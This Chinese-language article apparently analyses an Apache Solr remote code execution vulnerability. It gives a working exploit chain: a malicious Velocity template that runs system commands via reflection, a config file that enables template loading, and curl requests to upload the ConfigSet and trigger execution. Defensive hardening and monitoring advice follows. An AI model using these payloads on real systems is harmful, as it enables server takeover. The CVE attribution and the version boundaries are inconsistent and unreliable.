news 2026/4/16 15:50:08

深度剖析Solr远程代码执行漏洞(CVE-2019-12409)的原理、利用与防御体系

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
深度剖析Solr远程代码执行漏洞(CVE-2019-12409)的原理、利用与防御体系

Apache Solr作为主流的企业级搜索引擎,在大数据检索场景中应用广泛,但其在5.0.0至8.2.0版本中存在的CVE-2019-12409远程代码执行漏洞,曾给大量运维方带来严重安全威胁。该漏洞源于ConfigSet API的设计缺陷与Velocity模板引擎的危险配置叠加,攻击者可通过上传恶意配置包实现代码注入与执行。本文将从漏洞根源、技术原理、利用链路、防御方案及衍生安全启示五个维度展开深度分析,为企业构建Solr安全防护体系提供参考。

一、漏洞背景与影响范围

Apache Solr是基于Lucene开发的开源搜索引擎,支持分布式部署,广泛应用于电商、金融、政务等领域的全文检索、日志分析等场景。ConfigSet API是Solr提供的核心配置管理接口,允许用户上传自定义配置包(ZIP格式)以快速部署Solr Core,这一便捷性设计却因缺乏安全校验埋下隐患。

漏洞影响范围

  • 受影响版本:Apache Solr 5.0.0 ~ 8.2.0
  • 不受影响版本:8.2.0及以上(官方已在该版本中修复漏洞)
  • 影响场景:开启ConfigSet API对外开放、且启用Velocity模板引擎的Solr实例;若Solr部署在公网或无访问权限控制,攻击门槛极低。

二、漏洞核心原理:配置上传+模板注入的双重风险叠加

CVE-2019-12409并非单一缺陷导致,而是ConfigSet API的校验缺失Velocity模板引擎的危险配置共同作用的结果,其技术原理可拆解为两个关键环节:

(一)ConfigSet API的安全缺陷

Solr的ConfigSet API默认允许用户上传ZIP格式的配置包,用于创建或更新Solr Core的配置。但该接口在设计时存在两个致命问题:

  1. 无内容校验机制:未对上传ZIP包内的文件类型、内容进行过滤,攻击者可随意植入恶意文件(如Velocity模板文件);
  2. 无权限严格管控:早期版本中,ConfigSet API默认无需身份验证即可访问,公网暴露的实例可被直接攻击。

(二)Velocity模板引擎的执行风险

Velocity是Solr集成的模板引擎,用于动态生成查询响应结果。其核心危险配置项为params.resource.loader.enabled

  • 当该配置项设为true时(部分Solr版本默认开启),Velocity允许通过请求参数指定加载的模板文件路径;
  • 攻击者上传的恶意Velocity模板文件(如velocity.vm),可被Velocity引擎解析执行,而模板中可嵌入Java代码片段,最终实现远程代码执行(RCE)。

漏洞触发逻辑链
上传恶意ConfigSet ZIP包 → 创建使用该配置的Solr Core → 构造请求触发Velocity加载恶意模板 → 模板中的Java代码执行 → 获取目标服务器控制权

三、漏洞利用全链路技术解析(安全研究专用)

以下利用流程仅适用于授权安全测试,禁止用于非法攻击。测试环境:Solr 8.1.1(未授权访问,开启Velocity引擎)

(一)构造恶意ConfigSet配置包

  1. 搭建目录结构
    Solr的ConfigSet配置包需包含conf目录,且需存在solrconfig.xml核心配置文件,目录结构如下:

    evil_config/ └── conf/ ├── solrconfig.xml # 启用Velocity引擎的配置文件 └── velocity.vm # 恶意Velocity模板文件
  2. 编写恶意velocity.vm模板
    Velocity模板支持调用Java类,通过反射机制可执行系统命令,示例代码如下:

    #set($x = "") #set($rt = $x.getClass().forName("java.lang.Runtime")) #set($runtime = $rt.getMethod("getRuntime", null).invoke(null, null)) #set($exec = $runtime.getClass().getMethod("exec", $x.getClass()).invoke($runtime, "whoami")) #set($inputStream = $exec.getInputStream()) #set($bufferedReader = $x.getClass().forName("java.io.BufferedReader").getConstructor($x.getClass().forName("java.io.InputStreamReader")).newInstance($x.getClass().forName("java.io.InputStreamReader").getConstructor($inputStream).newInstance($inputStream))) #set($line = "") #foreach($i in [1..100]) #set($line = $bufferedReader.readLine()) #if($line == null) #break #end $line #end

    该代码通过反射调用Runtime.getRuntime().exec()执行whoami命令,并读取命令执行结果。

  3. 编写solrconfig.xml配置文件
    需在配置文件中启用Velocity响应写入器,并开启params.resource.loader.enabled,配置如下:

    <?xml version="1.0" encoding="UTF-8"?><config><luceneMatchVersion>8.1.1</luceneMatchVersion><!-- 启用Velocity响应写入器 --><queryResponseWritername="velocity"class="solr.VelocityResponseWriter"><strname="template.base.dir">.</str><boolname="params.resource.loader.enabled">true</bool></queryResponseWriter><!-- 其他基础配置 --><requestHandlername="/select"class="solr.SearchHandler"><lstname="defaults"><strname="echoParams">explicit</str><intname="rows">10</int></lst></requestHandler></config>
  4. 打包为ZIP配置包
    进入evil_config目录,执行打包命令:

    zip-r evil_config.zip ./conf

(二)上传恶意配置包并创建Solr Core

  1. 上传ConfigSet配置包
    通过ConfigSet API的UPLOAD动作上传ZIP包,请求示例:

    curl-X POST"http://target:8983/solr/admin/configs?action=UPLOAD&name=evil_config"-F"myfile=@evil_config.zip"

    若返回{"responseHeader":{"status":0,"QTime":xxx}},则表示上传成功。

  2. 创建使用恶意配置的Solr Core
    通过Core Admin API创建新Core,指定配置集为evil_config,请求示例:

    curl-X POST"http://target:8983/solr/admin/cores?action=CREATE&name=evil_core&configSet=evil_config&instanceDir=evil_core"

(三)触发恶意模板执行,实现RCE

构造/select查询请求,指定响应格式为velocity,并加载恶意velocity.vm模板,请求示例:

curl"http://target:8983/solr/evil_core/select?q=*:*&wt=velocity&v.template=velocity.vm"

若请求返回目标服务器的用户名(如root),则表示漏洞利用成功,攻击者可进一步修改模板中的命令,实现文件上传、权限提升等操作。

四、漏洞防御与修复方案:构建多层防护体系

针对CVE-2019-12409,需从版本修复、配置加固、访问控制、日志审计四个维度构建防御体系,具体方案如下:

(一)紧急修复:版本升级(最根本方案)

立即将Solr升级至8.2.0及以上版本,官方在该版本中对ConfigSet API做了以下修复:

  1. 新增ConfigSet上传内容校验机制,禁止嵌入恶意模板文件;
  2. 默认关闭params.resource.loader.enabled配置项;
  3. 强化ConfigSet API的权限管控,默认要求管理员身份验证。

(二)临时加固:无法升级时的配置调整

若因业务限制无法立即升级,需执行以下加固操作:

  1. 禁用Velocity模板引擎的危险配置
    修改所有Solr Core的solrconfig.xml文件,将params.resource.loader.enabled设为false

    <queryResponseWritername="velocity"class="solr.VelocityResponseWriter"><boolname="params.resource.loader.enabled">false</bool></queryResponseWriter>

    若无需使用Velocity功能,可直接删除该配置块。

  2. 限制ConfigSet API的访问权限

    • 通过防火墙、反向代理(如Nginx)限制/solr/admin/configs/solr/admin/cores接口的访问,仅允许内网可信IP调用;
    • 启用Solr的身份验证功能(如Basic Auth、Kerberos),配置security.json文件,要求访问管理接口需提供管理员凭证。
  3. 禁止公网暴露Solr管理端口
    Solr默认端口为8983,需避免该端口直接暴露在公网;若需对外提供检索服务,仅开放/select等业务接口,屏蔽所有管理接口。

(三)长期防护:安全运维规范

  1. 日志审计与异常监控
    开启Solr的访问日志与操作日志,重点监控以下异常行为:

    • 频繁的UPLOAD/CREATE动作(针对ConfigSet/Core);
    • 请求中包含wt=velocityv.template等关键词;
    • 来自陌生IP的管理接口访问请求。
  2. 定期漏洞扫描与版本检测
    使用专业漏洞扫描工具(如Nessus、OpenVAS)定期扫描Solr实例,检测是否存在漏洞版本;同时关注Apache官方安全公告,及时修复新出现的漏洞。

  3. 最小权限原则部署
    运行Solr的服务器账号需遵循最小权限原则,避免使用rootAdministrator账号启动Solr服务,降低漏洞被利用后的危害程度。

五、漏洞衍生安全启示:开源组件的安全治理

CVE-2019-12409的爆发,折射出开源组件安全治理的三大核心问题,值得企业借鉴:

  1. 便捷性与安全性的平衡:开源组件的功能设计需兼顾便捷性与安全性,不能为了开发效率而忽视权限校验、内容过滤等安全机制;
  2. 默认配置的安全加固:开源软件的默认配置应遵循“安全优先”原则,关闭不必要的危险功能(如本次漏洞中的params.resource.loader.enabled);
  3. 供应链安全管理:企业需建立开源组件的全生命周期管理体系,定期梳理组件版本、修复漏洞,避免“带病运行”。

结语

CVE-2019-12409作为典型的“配置缺陷+接口滥用”类漏洞,其利用门槛低、危害大的特点,曾导致大量Solr实例被攻击。对于企业而言,除了及时修复漏洞、加固配置外,更需建立常态化的安全运维与监控机制,才能从根本上抵御此类攻击。

版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/4/16 14:05:01

错过将后悔!,Open-AutoGLM流量监控预警技术内部培训资料首次流出

第一章&#xff1a;Open-AutoGLM流量监控预警Open-AutoGLM 是一个基于大语言模型驱动的自动化流量分析与预警系统&#xff0c;专为高并发网络环境设计。它通过实时采集网络节点的请求数据&#xff0c;结合动态阈值算法识别异常流量模式&#xff0c;能够在毫秒级内触发告警并执行…

作者头像 李华
网站建设 2026/4/16 14:32:43

Open-AutoGLM为何频频超标?3步定位异常消耗源头

第一章&#xff1a;Open-AutoGLM 预算超标预警在大规模部署 Open-AutoGLM 模型推理服务时&#xff0c;云资源消耗可能迅速超出预设预算。为防止意外费用激增&#xff0c;系统需集成实时预算监控与自动告警机制。监控指标配置 关键监控指标包括每小时 API 调用次数、GPU 实例运行…

作者头像 李华
网站建设 2026/4/16 12:22:08

基于协同过滤算法的校园食堂订餐系统_38r71ot7--论文-爬虫 可视化

文章目录系统截图项目简介大数据系统开发流程主要运用技术介绍爬虫核心代码展示结论源码文档获取定制开发/同行可拿货,招校园代理 &#xff1a;文章底部获取博主联系方式&#xff01;系统截图 基于协同过滤算法的校园食堂订餐系统_38r71ot7–论文-爬虫 可视化 项目简介 …

作者头像 李华
网站建设 2026/4/16 15:13:55

破局云原生:软件测试面临的全新挑战与对策

1 云原生测试的范式转移 随着微服务、容器化和动态编排成为现代应用的核心特征&#xff0c;测试工作正经历从“验证功能”到“保障韧性”的范式升级。根据CNCF 2025年度调查报告&#xff0c;已有78%的生产环境采用容器技术&#xff0c;但平均每个应用由12个微服务构成&#xf…

作者头像 李华
网站建设 2026/4/16 15:15:17

Excalidraw抖音短视频运营思路

Excalidraw 与抖音短视频内容生产的融合实践 在知识类短视频井喷式增长的今天&#xff0c;一个现实问题摆在每一位内容运营者面前&#xff1a;如何在保证信息密度的同时&#xff0c;持续输出视觉统一、节奏紧凑、表达清晰的高质量视频&#xff1f;尤其是技术科普、产品解析、学…

作者头像 李华